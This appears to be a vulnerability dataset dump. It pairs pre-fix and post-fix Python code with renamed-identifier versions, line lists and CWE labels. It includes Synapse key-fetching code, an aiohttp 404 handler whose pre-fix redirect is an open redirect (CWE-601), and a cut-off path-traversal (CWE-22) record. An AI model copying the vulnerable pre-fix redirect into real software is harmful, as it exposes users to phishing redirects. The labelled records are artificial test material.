await defer.DeferredList((w[1] for w in VAR_46))
VAR_27 += 1
def FUNC_6(self, VAR_12):
VAR_15 = {rq for rq in VAR_12 if not rq.key_ready.called}
async def FUNC_14():
try:
with Measure(self.clock, "get_server_verify_keys"):
for f in self._key_fetchers:
if not VAR_15:
return
await self._attempt_key_fetches_with_fetcher(
f, VAR_15
)
while VAR_15:
VAR_1 = VAR_15.pop()
VAR_60 = (
"VerifyJsonRequest(server=%s, VAR_6=%s, min_valid=%i)"
% (
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
)
self.clock.call_later(
0,
VAR_1.key_ready.errback,
SynapseError(
401,
"Failed to find any VAR_49 to satisfy %s" % (VAR_60,),
Codes.UNAUTHORIZED,
),
)
except Exception as err:
VAR_0.error("Unexpected error in FUNC_6: %s", err)
with PreserveLoggingContext():
for VAR_1 in VAR_15:
if not VAR_1.key_ready.called:
VAR_1.key_ready.errback(err)
run_in_background(FUNC_14)
async def FUNC_7(self, VAR_14, VAR_15):
VAR_28 = defaultdict(dict)
for VAR_1 in VAR_15:
assert not VAR_1.key_ready.called
VAR_47 = VAR_28[VAR_1.server_name]
for VAR_43 in VAR_1.key_ids:
VAR_47[VAR_43] = max(
VAR_47.get(VAR_43, -1),
VAR_1.minimum_valid_until_ts,
)
VAR_26 = await VAR_14.get_keys(VAR_28)
VAR_29 = []
for VAR_1 in VAR_15:
VAR_2 = VAR_1.server_name
VAR_48 = VAR_26.get(VAR_2, {})
for VAR_43 in VAR_1.key_ids:
VAR_55 = VAR_48.get(VAR_43)
if not VAR_55:
continue
if (
VAR_55.valid_until_ts
< VAR_1.minimum_valid_until_ts
):
continue
VAR_0.debug(
"Found VAR_49 %s:%s for %s",
VAR_2,
VAR_43,
VAR_1.request_name,
)
self.clock.call_later(
0,
VAR_1.key_ready.callback,
(VAR_2, VAR_43, VAR_55.verify_key),
)
VAR_29.append(VAR_1)
break
VAR_15.difference_update(VAR_29)
class CLASS_3:
async def FUNC_8(self, VAR_16):
raise NotImplementedError
class CLASS_4(CLASS_3):
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
async def FUNC_8(self, VAR_16):
VAR_16 = (
(VAR_2, VAR_43)
for VAR_2, VAR_47 in VAR_16.items()
for VAR_43 in VAR_47.keys()
)
VAR_30 = await self.store.get_server_verify_keys(VAR_16)
VAR_31 = {}
for (VAR_2, VAR_43), VAR_49 in VAR_30.items():
VAR_31.setdefault(VAR_2, {})[VAR_43] = VAR_49
return VAR_31
class CLASS_5:
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
self.config = VAR_8.get_config()
async def FUNC_9(self, VAR_17, VAR_18, VAR_19):
VAR_32 = VAR_18["valid_until_ts"]
VAR_33 = {}
for VAR_43, key_data in VAR_18["verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=VAR_32
)
VAR_2 = VAR_18["server_name"]
VAR_34 = False
for VAR_43 in VAR_18["signatures"].get(VAR_2, {}):
VAR_49 = VAR_33.get(VAR_43)
if not VAR_49:
continue
verify_signed_json(VAR_18, VAR_2, VAR_49.verify_key)
VAR_34 = True
break
if not VAR_34:
raise CLASS_1(
"Key VAR_21 for %s is not signed by the origin server"
% (VAR_2,)
)
for VAR_43, key_data in VAR_18["old_verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=key_data["expired_ts"]
)
VAR_35 = encode_canonical_json(VAR_18)
await make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.store_server_keys_json,
VAR_2=VAR_2,
VAR_43=key_id,
VAR_17=from_server,
ts_now_ms=VAR_19,
ts_expires_ms=VAR_32,
VAR_35=key_json_bytes,
)
for VAR_43 in VAR_33
],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
return VAR_33
class CLASS_6(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_federation_http_client()
self.key_servers = self.config.key_servers
async def FUNC_8(self, VAR_16):
async def FUNC_15(VAR_20):
try:
VAR_58 = await self.get_server_verify_key_v2_indirect(
VAR_16, VAR_20
)
return VAR_58
except CLASS_1 as e:
VAR_0.warning(
"Key lookup failed from %r: %s", VAR_20.server_name, e
)
except Exception as e:
VAR_0.exception(
"Unable to get VAR_49 from %r: %s %s",
VAR_20.server_name,
type(e).__name__,
str(e),
)
return {}
VAR_26 = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(FUNC_15, server) for server in self.key_servers],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
VAR_36 = {}
for VAR_58 in VAR_26:
for VAR_2, VAR_31 in VAR_58.items():
VAR_36.setdefault(VAR_2, {}).update(VAR_31)
return VAR_36
async def FUNC_10(self, VAR_16, VAR_20):
VAR_37 = VAR_20.server_name
VAR_0.info(
"Requesting VAR_31 %s from notary server %s",
VAR_16.items(),
VAR_37,
)
try:
VAR_50 = await self.client.post_json(
destination=VAR_37,
path="/_matrix/VAR_49/v2/query",
data={
"server_keys": {
VAR_2: {
VAR_43: {"minimum_valid_until_ts": min_valid_ts}
for VAR_43, min_valid_ts in server_keys.items()
}
for VAR_2, server_keys in VAR_16.items()
}
},
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
VAR_31 = {}
VAR_38 = []
VAR_39 = self.clock.time_msec()
for VAR_21 in VAR_50["server_keys"]:
VAR_2 = VAR_21.get("server_name")
if not isinstance(VAR_2, str):
raise CLASS_1(
"Malformed VAR_21 from VAR_49 notary server %s: invalid server_name"
% (VAR_37,)
)
try:
self._validate_perspectives_response(VAR_20, VAR_21)
VAR_59 = await self.process_v2_response(
VAR_37, VAR_21, VAR_19=VAR_39
)
except CLASS_1 as e:
VAR_0.warning(
"Error processing VAR_21 from VAR_49 notary server %s for origin "
"server %s: %s",
VAR_37,
VAR_2,
e,
)
continue
VAR_38.extend(
(VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_59.items()
)
VAR_31.setdefault(VAR_2, {}).update(VAR_59)
await self.store.store_server_verify_keys(
VAR_37, VAR_39, VAR_38
)
return VAR_31
def FUNC_11(self, VAR_20, VAR_21):
VAR_37 = VAR_20.server_name
VAR_40 = VAR_20.verify_keys
if VAR_40 is None:
return
if (
"signatures" not in VAR_21
or VAR_37 not in VAR_21["signatures"]
):
raise CLASS_1("Response not signed by the notary server")
VAR_34 = False
for VAR_43 in VAR_21["signatures"][VAR_37]:
if VAR_43 in VAR_40:
verify_signed_json(VAR_21, VAR_37, VAR_40[VAR_43])
VAR_34 = True
if not VAR_34:
raise CLASS_1(
"Response not signed with a known VAR_49: signed with: %r, known VAR_31: %r"
% (
list(VAR_21["signatures"][VAR_37].keys()),
list(VAR_40.keys()),
)
)
class CLASS_7(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_federation_http_client()
async def FUNC_8(self, VAR_16):
VAR_26 = {}
async def FUNC_15(VAR_41):
VAR_2, VAR_6 = VAR_41
try:
VAR_31 = await self.get_server_verify_key_v2_direct(VAR_2, VAR_6)
VAR_26[VAR_2] = VAR_31
except CLASS_1 as e:
VAR_0.warning(
"Error looking up VAR_31 %s from %s: %s", VAR_6, VAR_2, e
)
except Exception:
VAR_0.exception("Error getting VAR_31 %s from %s", VAR_6, VAR_2)
await yieldable_gather_results(FUNC_15, VAR_16.items())
return VAR_26
async def FUNC_12(self, VAR_2, VAR_6):
VAR_31 = {} # type: dict[str, FetchKeyResult]
for requested_key_id in VAR_6:
if requested_key_id in VAR_31:
continue
VAR_39 = self.clock.time_msec()
try:
VAR_21 = await self.client.get_json(
destination=VAR_2,
path="/_matrix/VAR_49/v2/server/"
+ urllib.parse.quote(requested_key_id),
ignore_backoff=True,
timeout=10000,
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
if VAR_21["server_name"] != VAR_2:
raise CLASS_1(
"Expected a VAR_21 for server %r not %r"
% (VAR_2, VAR_21["server_name"])
)
VAR_51 = await self.process_v2_response(
VAR_17=VAR_2,
VAR_18=VAR_21,
VAR_19=VAR_39,
)
await self.store.store_server_verify_keys(
VAR_2,
VAR_39,
((VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_51.items()),
)
VAR_31.update(VAR_51)
return VAR_31
async def FUNC_0(VAR_1) -> None:
VAR_2 = VAR_1.server_name
with PreserveLoggingContext():
VAR_42, VAR_43, VAR_44 = await VAR_1.key_ready
VAR_3 = VAR_1.json_object
try:
verify_signed_json(VAR_3, VAR_2, VAR_44)
except SignatureVerifyException as e:
VAR_0.debug(
"Error verifying signature for %s:%s:%s with VAR_49 %s: %s",
VAR_2,
VAR_44.alg,
VAR_44.version,
encode_verify_key_base64(VAR_44),
str(e),
)
raise SynapseError(
401,
"Invalid signature for server %s with VAR_49 %s:%s: %s"
% (VAR_2, VAR_44.alg, VAR_44.version, str(e)),
Codes.UNAUTHORIZED,
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
20,
34,
36,
54,
56,
57,
62,
65,
68,
70,
73,
78,
82,
89,
92,
93,
96,
97,
101,
109,
110,
111,
112,
113,
114,
116,
121,
124,
126,
129,
132,
140,
144,
149,
152,
155,
166,
169,
170,
174,
181,
184,
187,
199,
207,
208,
210,
211,
212,
213,
214,
215,
217,
219,
222,
224,
227,
229,
233,
235,
237,
242,
243,
245,
246,
247,
251,
252,
253,
257,
262,
263,
267,
269,
272,
273,
277,
280,
283,
304,
306,
309,
313,
317,
319,
329,
330,
341,
342,
343,
344,
345,
346,
347,
358,
359,
360,
366,
368,
371,
377,
378,
380,
382,
385,
387,
388,
389,
390,
395,
397,
401,
402,
403,
408,
410,
415,
417,
418,
419,
420,
421,
422,
423,
437,
439,
440,
447,
453,
454,
457,
460,
463,
469,
475,
476,
481,
484,
488,
491,
494,
499,
501,
503,
508,
509,
510,
520,
526,
527,
528,
529,
530,
532,
536,
542,
551,
553,
571,
573,
574,
577,
583,
586,
604,
606,
613,
618,
620,
626,
629,
633,
644,
660,
664,
667,
669,
671,
678,
681,
693,
695,
700,
704,
706,
709,
713,
718,
720,
722,
728,
734,
743,
744,
747,
752,
758,
763,
765,
777,
780,
783,
787,
790,
795,
797,
800,
808,
809,
810,
811,
812,
813,
814,
815,
816,
817,
818,
822,
823,
827,
833,
845,
847,
848,
851,
854,
861,
863,
881,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
456,
576,
746,
850,
851,
852,
853,
854,
855,
856,
857,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
226,
227,
228,
229,
230,
231,
232,
279,
280,
281,
282,
283,
284,
285,
286,
287,
308,
309,
310,
311,
312,
313,
314,
315,
316,
370,
371,
372,
373,
374,
375,
376,
443,
444,
445,
446,
447,
448,
449,
450,
451,
462,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
585,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
708,
709,
710,
711,
712,
713,
714,
715,
754,
755,
756,
757,
758,
759,
760,
761,
762,
782,
783,
784,
785,
786,
787,
788,
789,
790,
791,
792,
793,
186,
187,
188,
189,
190
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
20,
34,
36,
54,
56,
57,
62,
65,
68,
70,
73,
78,
82,
89,
92,
93,
96,
97,
101,
109,
110,
111,
112,
113,
114,
116,
121,
124,
126,
129,
132,
140,
144,
149,
152,
155,
166,
169,
170,
174,
181,
184,
187,
199,
207,
208,
210,
211,
212,
213,
214,
215,
217,
219,
222,
224,
227,
229,
233,
235,
237,
242,
243,
245,
246,
247,
251,
252,
253,
257,
262,
263,
267,
269,
272,
273,
277,
280,
283,
304,
306,
309,
313,
317,
319,
329,
330,
341,
342,
343,
344,
345,
346,
347,
358,
359,
360,
366,
368,
371,
377,
378,
380,
382,
385,
387,
388,
389,
390,
395,
397,
401,
402,
403,
408,
410,
415,
417,
418,
419,
420,
421,
422,
423,
437,
439,
440,
447,
453,
454,
457,
460,
463,
469,
475,
476,
481,
484,
488,
491,
494,
499,
501,
503,
508,
509,
510,
520,
526,
527,
528,
529,
530,
532,
536,
542,
551,
553,
571,
573,
574,
577,
583,
586,
604,
606,
613,
618,
620,
626,
629,
633,
644,
660,
664,
667,
669,
671,
678,
681,
693,
695,
700,
704,
706,
709,
713,
718,
720,
722,
728,
734,
743,
744,
747,
752,
758,
763,
765,
777,
780,
783,
787,
790,
795,
797,
800,
808,
809,
810,
811,
812,
813,
814,
815,
816,
817,
818,
822,
823,
827,
833,
845,
847,
848,
851,
854,
861,
863,
881,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
456,
576,
746,
850,
851,
852,
853,
854,
855,
856,
857,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
226,
227,
228,
229,
230,
231,
232,
279,
280,
281,
282,
283,
284,
285,
286,
287,
308,
309,
310,
311,
312,
313,
314,
315,
316,
370,
371,
372,
373,
374,
375,
376,
443,
444,
445,
446,
447,
448,
449,
450,
451,
462,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
585,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
708,
709,
710,
711,
712,
713,
714,
715,
754,
755,
756,
757,
758,
759,
760,
761,
762,
782,
783,
784,
785,
786,
787,
788,
789,
790,
791,
792,
793,
186,
187,
188,
189,
190
] |
4CWE-601
| import logging
from aiohttp import web
import os
logger = logging.getLogger(__package__)
def setup_middlewares(app):
error_middleware = error_pages({404: handle_404,
500: handle_500})
app.middlewares.append(error_middleware)
app.middlewares.append(cache_control_middleware)
# Cache-Control middleware
CACHE_MAX_AGE = int(os.getenv("CACHE_MAX_AGE", "30"))
NO_CACHE_ENDPOINTS = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def cache_control_middleware(app, handler):
async def middleware_handler(request):
response = await handler(request)
cache_control_value = "public; max-age={}".format(CACHE_MAX_AGE)
if request.path in NO_CACHE_ENDPOINTS or CACHE_MAX_AGE <= 0:
cache_control_value = "no-cache"
response.headers.setdefault("Cache-Control", cache_control_value)
return response
return middleware_handler
# Error page middlewares
def error_pages(overrides):
async def middleware(app, handler):
async def middleware_handler(request):
try:
response = await handler(request)
override = overrides.get(response.status)
if override is None:
return response
else:
return await override(request, response)
except web.HTTPException as ex:
override = overrides.get(ex.status)
if override is None:
return await handle_any(request, ex)
else:
return await override(request, ex)
except Exception as ex:
return await handle_500(request, error=ex)
return middleware_handler
return middleware
async def handle_any(request, response):
return web.json_response({
"status": response.status,
"message": response.reason
}, status=response.status)
async def handle_404(request, response):
if 'json' not in response.headers['Content-Type']:
if request.path.endswith('/'):
return web.HTTPFound(request.path.rstrip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(request.path)
}, status=404)
return response
async def handle_500(request, response=None, error=None):
logger.exception(error)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| import logging
from aiohttp import web
import os
logger = logging.getLogger(__package__)
def setup_middlewares(app):
error_middleware = error_pages({404: handle_404,
500: handle_500})
app.middlewares.append(error_middleware)
app.middlewares.append(cache_control_middleware)
# Cache-Control middleware
CACHE_MAX_AGE = int(os.getenv("CACHE_MAX_AGE", "30"))
NO_CACHE_ENDPOINTS = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def cache_control_middleware(app, handler):
async def middleware_handler(request):
response = await handler(request)
cache_control_value = "public; max-age={}".format(CACHE_MAX_AGE)
if request.path in NO_CACHE_ENDPOINTS or CACHE_MAX_AGE <= 0:
cache_control_value = "no-cache"
response.headers.setdefault("Cache-Control", cache_control_value)
return response
return middleware_handler
# Error page middlewares
def error_pages(overrides):
async def middleware(app, handler):
async def middleware_handler(request):
try:
response = await handler(request)
override = overrides.get(response.status)
if override is None:
return response
else:
return await override(request, response)
except web.HTTPException as ex:
override = overrides.get(ex.status)
if override is None:
return await handle_any(request, ex)
else:
return await override(request, ex)
except Exception as ex:
return await handle_500(request, error=ex)
return middleware_handler
return middleware
async def handle_any(request, response):
return web.json_response({
"status": response.status,
"message": response.reason
}, status=response.status)
async def handle_404(request, response):
if 'json' not in response.headers['Content-Type']:
if request.path.endswith('/'):
return web.HTTPFound('/' + request.path.strip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(request.path)
}, status=404)
return response
async def handle_500(request, response=None, error=None):
logger.exception(error)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| open_redirect | {
"code": [
" return web.HTTPFound(request.path.rstrip('/'))"
],
"line_no": [
64
]
} | {
"code": [
" return web.HTTPFound('/' + request.path.strip('/'))"
],
"line_no": [
64
]
} | import logging
from aiohttp import web
import os
VAR_0 = logging.getLogger(__package__)
def FUNC_0(VAR_1):
VAR_9 = FUNC_2({404: FUNC_4,
500: FUNC_5})
VAR_1.middlewares.append(VAR_9)
VAR_1.middlewares.append(FUNC_1)
VAR_2 = int(os.getenv("CACHE_MAX_AGE", "30"))
VAR_3 = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def FUNC_1(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
VAR_7 = await VAR_4(VAR_6)
VAR_10 = "public; max-age={}".format(VAR_2)
if VAR_6.path in VAR_3 or VAR_2 <= 0:
VAR_10 = "no-cache"
VAR_7.headers.setdefault("Cache-Control", VAR_10)
return VAR_7
return FUNC_6
def FUNC_2(VAR_5):
async def FUNC_7(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
try:
VAR_7 = await VAR_4(VAR_6)
VAR_11 = VAR_5.get(VAR_7.status)
if VAR_11 is None:
return VAR_7
else:
return await VAR_11(VAR_6, VAR_7)
except web.HTTPException as ex:
VAR_11 = VAR_5.get(ex.status)
if VAR_11 is None:
return await FUNC_3(VAR_6, ex)
else:
return await VAR_11(VAR_6, ex)
except Exception as ex:
return await FUNC_5(VAR_6, VAR_8=ex)
return FUNC_6
return FUNC_7
async def FUNC_3(VAR_6, VAR_7):
return web.json_response({
"status": VAR_7.status,
"message": VAR_7.reason
}, status=VAR_7.status)
async def FUNC_4(VAR_6, VAR_7):
if 'json' not in VAR_7.headers['Content-Type']:
if VAR_6.path.endswith('/'):
return web.HTTPFound(VAR_6.path.rstrip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(VAR_6.path)
}, status=404)
return VAR_7
async def FUNC_5(VAR_6, VAR_7=None, VAR_8=None):
VAR_0.exception(VAR_8)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| import logging
from aiohttp import web
import os
VAR_0 = logging.getLogger(__package__)
def FUNC_0(VAR_1):
VAR_9 = FUNC_2({404: FUNC_4,
500: FUNC_5})
VAR_1.middlewares.append(VAR_9)
VAR_1.middlewares.append(FUNC_1)
VAR_2 = int(os.getenv("CACHE_MAX_AGE", "30"))
VAR_3 = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def FUNC_1(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
VAR_7 = await VAR_4(VAR_6)
VAR_10 = "public; max-age={}".format(VAR_2)
if VAR_6.path in VAR_3 or VAR_2 <= 0:
VAR_10 = "no-cache"
VAR_7.headers.setdefault("Cache-Control", VAR_10)
return VAR_7
return FUNC_6
def FUNC_2(VAR_5):
async def FUNC_7(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
try:
VAR_7 = await VAR_4(VAR_6)
VAR_11 = VAR_5.get(VAR_7.status)
if VAR_11 is None:
return VAR_7
else:
return await VAR_11(VAR_6, VAR_7)
except web.HTTPException as ex:
VAR_11 = VAR_5.get(ex.status)
if VAR_11 is None:
return await FUNC_3(VAR_6, ex)
else:
return await VAR_11(VAR_6, ex)
except Exception as ex:
return await FUNC_5(VAR_6, VAR_8=ex)
return FUNC_6
return FUNC_7
async def FUNC_3(VAR_6, VAR_7):
return web.json_response({
"status": VAR_7.status,
"message": VAR_7.reason
}, status=VAR_7.status)
async def FUNC_4(VAR_6, VAR_7):
if 'json' not in VAR_7.headers['Content-Type']:
if VAR_6.path.endswith('/'):
return web.HTTPFound('/' + VAR_6.path.strip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(VAR_6.path)
}, status=404)
return VAR_7
async def FUNC_5(VAR_6, VAR_7=None, VAR_8=None):
VAR_0.exception(VAR_8)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| [
4,
6,
7,
13,
14,
15,
18,
19,
29,
30,
31,
52,
53,
59,
60,
70,
71,
78
] | [
4,
6,
7,
13,
14,
15,
18,
19,
29,
30,
31,
52,
53,
59,
60,
70,
71,
78
] |
0CWE-22
| import collections
import os
import re
import lxml
def englishFromList(items, conjunction="or"):
# Format a list of strings into an English list.
items = list(items)
if len(items) == 1:
return items[0]
if len(items) == 2:
return "{0} {2} {1}".format(items[0], items[1], conjunction)
return "{0}, {2} {1}".format(", ".join(items[:-1]), items[-1], conjunction)
def intersperse(iterable, delimiter):
it = iter(iterable)
yield next(it)
for x in it:
yield delimiter
yield x
def processTextNodes(nodes, regex, replacer):
"""
Takes an array of alternating text/objects,
and runs reSubObject on the text parts,
splicing them into the passed-in array.
Mutates!
"""
for i, node in enumerate(nodes):
# Node list always alternates between text and elements
if i % 2 == 0:
nodes[i : i + 1] = reSubObject(regex, node, replacer)
return nodes
def reSubObject(pattern, string, repl=None):
"""
like re.sub, but replacements don't have to be text;
returns an array of alternating unmatched text and match objects instead.
If repl is specified, it's called with each match object,
and the result then shows up in the array instead.
"""
lastEnd = 0
pieces = []
for match in pattern.finditer(string):
pieces.append(string[lastEnd : match.start()])
if repl:
pieces.append(repl(match))
else:
pieces.append(match)
lastEnd = match.end()
pieces.append(string[lastEnd:])
return pieces
def simplifyText(text):
# Remove anything that's not a name character.
text = text.strip().lower()
# I convert ( to - so foo(bar) becomes foo-bar,
# but then I have to remove () because there's nothing to separate,
# otherwise I get a double-dash in some cases.
text = re.sub(r"\(\)", "", text)
text = re.sub(r"[\s/(,]+", "-", text)
text = re.sub(r"[^a-z0-9_-]", "", text)
text = text.rstrip("-")
return text
def linkTextsFromElement(el):
from ..h import find, textContent
if el.get("data-lt") == "":
return []
elif el.get("data-lt"):
rawText = el.get("data-lt")
if rawText in ["|", "||", "|||"]:
texts = [rawText]
else:
texts = [x.strip() for x in rawText.split("|")]
else:
if el.tag in ("dfn", "a"):
texts = [textContent(el).strip()]
elif el.tag in ("h2", "h3", "h4", "h5", "h6"):
texts = [textContent(find(".content", el)).strip()]
if el.get("data-local-lt"):
localTexts = [x.strip() for x in el.get("data-local-lt").split("|")]
for text in localTexts:
if text in texts:
# lt and local-lt both specify the same thing
raise DuplicatedLinkText(text, texts + localTexts, el)
texts += localTexts
texts = [re.sub(r"\s+", " ", x) for x in texts if x != ""]
return texts
class DuplicatedLinkText(Exception):
def __init__(self, offendingText, allTexts, el):
super().__init__()
self.offendingText = offendingText
self.allTexts = allTexts
self.el = el
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def firstLinkTextFromElement(el):
try:
texts = linkTextsFromElement(el)
except DuplicatedLinkText as e:
texts = e.allTexts
return texts[0] if len(texts) > 0 else None
def splitForValues(forValues):
"""
Splits a string of 1+ "for" values into an array of individual value.
Respects function args, etc.
Currently, for values are separated by commas.
"""
if forValues is None:
return None
forValues = re.sub(r"\s+", " ", forValues)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", forValues)
if value.strip()
]
def groupFromKey(key, length=2):
"""Generates a filename-safe "group" from a key, of a specified length."""
if key in _groupFromKeyCache:
return _groupFromKeyCache[key]
safeChars = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
group = ""
for char in key.lower():
if len(group) == length:
_groupFromKeyCache[key] = group
return group
if char in safeChars:
group += char
else:
group = group.ljust(length, "_")
_groupFromKeyCache[key] = group
return group
_groupFromKeyCache = {}
def flatten(arr):
for el in arr:
if (
isinstance(el, collections.Iterable)
and not isinstance(el, str)
and not lxml.etree.iselement(el)
):
yield from flatten(el)
else:
yield el
def scriptPath(*pathSegs):
startPath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
return os.path.join(startPath, *pathSegs)
def doEvery(s, action, lastTime=None):
# Takes an action every N seconds.
# Pass it the duration and the last time it took the action;
# it returns the time it last took the action
# (possibly just now).
# If you want to take action on first call,
# pass 0 as lastTime;
# otherwise it won't take action until N seconds.
import time
newTime = time.time()
if lastTime is None:
lastTime = newTime
if lastTime == 0 or newTime - lastTime > s:
action()
return newTime
return lastTime
| import collections
import os
import re
import lxml
from .. import constants
from .. import messages
def englishFromList(items, conjunction="or"):
# Format a list of strings into an English list.
items = list(items)
if len(items) == 1:
return items[0]
if len(items) == 2:
return "{0} {2} {1}".format(items[0], items[1], conjunction)
return "{0}, {2} {1}".format(", ".join(items[:-1]), items[-1], conjunction)
def intersperse(iterable, delimiter):
it = iter(iterable)
yield next(it)
for x in it:
yield delimiter
yield x
def processTextNodes(nodes, regex, replacer):
"""
Takes an array of alternating text/objects,
and runs reSubObject on the text parts,
splicing them into the passed-in array.
Mutates!
"""
for i, node in enumerate(nodes):
# Node list always alternates between text and elements
if i % 2 == 0:
nodes[i : i + 1] = reSubObject(regex, node, replacer)
return nodes
def reSubObject(pattern, string, repl=None):
"""
like re.sub, but replacements don't have to be text;
returns an array of alternating unmatched text and match objects instead.
If repl is specified, it's called with each match object,
and the result then shows up in the array instead.
"""
lastEnd = 0
pieces = []
for match in pattern.finditer(string):
pieces.append(string[lastEnd : match.start()])
if repl:
pieces.append(repl(match))
else:
pieces.append(match)
lastEnd = match.end()
pieces.append(string[lastEnd:])
return pieces
def simplifyText(text):
# Remove anything that's not a name character.
text = text.strip().lower()
# I convert ( to - so foo(bar) becomes foo-bar,
# but then I have to remove () because there's nothing to separate,
# otherwise I get a double-dash in some cases.
text = re.sub(r"\(\)", "", text)
text = re.sub(r"[\s/(,]+", "-", text)
text = re.sub(r"[^a-z0-9_-]", "", text)
text = text.rstrip("-")
return text
def linkTextsFromElement(el):
from ..h import find, textContent
if el.get("data-lt") == "":
return []
elif el.get("data-lt"):
rawText = el.get("data-lt")
if rawText in ["|", "||", "|||"]:
texts = [rawText]
else:
texts = [x.strip() for x in rawText.split("|")]
else:
if el.tag in ("dfn", "a"):
texts = [textContent(el).strip()]
elif el.tag in ("h2", "h3", "h4", "h5", "h6"):
texts = [textContent(find(".content", el)).strip()]
if el.get("data-local-lt"):
localTexts = [x.strip() for x in el.get("data-local-lt").split("|")]
for text in localTexts:
if text in texts:
# lt and local-lt both specify the same thing
raise DuplicatedLinkText(text, texts + localTexts, el)
texts += localTexts
texts = [re.sub(r"\s+", " ", x) for x in texts if x != ""]
return texts
class DuplicatedLinkText(Exception):
def __init__(self, offendingText, allTexts, el):
super().__init__()
self.offendingText = offendingText
self.allTexts = allTexts
self.el = el
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def firstLinkTextFromElement(el):
try:
texts = linkTextsFromElement(el)
except DuplicatedLinkText as e:
texts = e.allTexts
return texts[0] if len(texts) > 0 else None
def splitForValues(forValues):
"""
Splits a string of 1+ "for" values into an array of individual value.
Respects function args, etc.
Currently, for values are separated by commas.
"""
if forValues is None:
return None
forValues = re.sub(r"\s+", " ", forValues)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", forValues)
if value.strip()
]
def groupFromKey(key, length=2):
"""Generates a filename-safe "group" from a key, of a specified length."""
if key in _groupFromKeyCache:
return _groupFromKeyCache[key]
safeChars = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
group = ""
for char in key.lower():
if len(group) == length:
_groupFromKeyCache[key] = group
return group
if char in safeChars:
group += char
else:
group = group.ljust(length, "_")
_groupFromKeyCache[key] = group
return group
_groupFromKeyCache = {}
def flatten(arr):
for el in arr:
if (
isinstance(el, collections.Iterable)
and not isinstance(el, str)
and not lxml.etree.iselement(el)
):
yield from flatten(el)
else:
yield el
def scriptPath(*pathSegs):
startPath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
path = os.path.join(startPath, *pathSegs)
return path
def chrootPath(chrootPath, path):
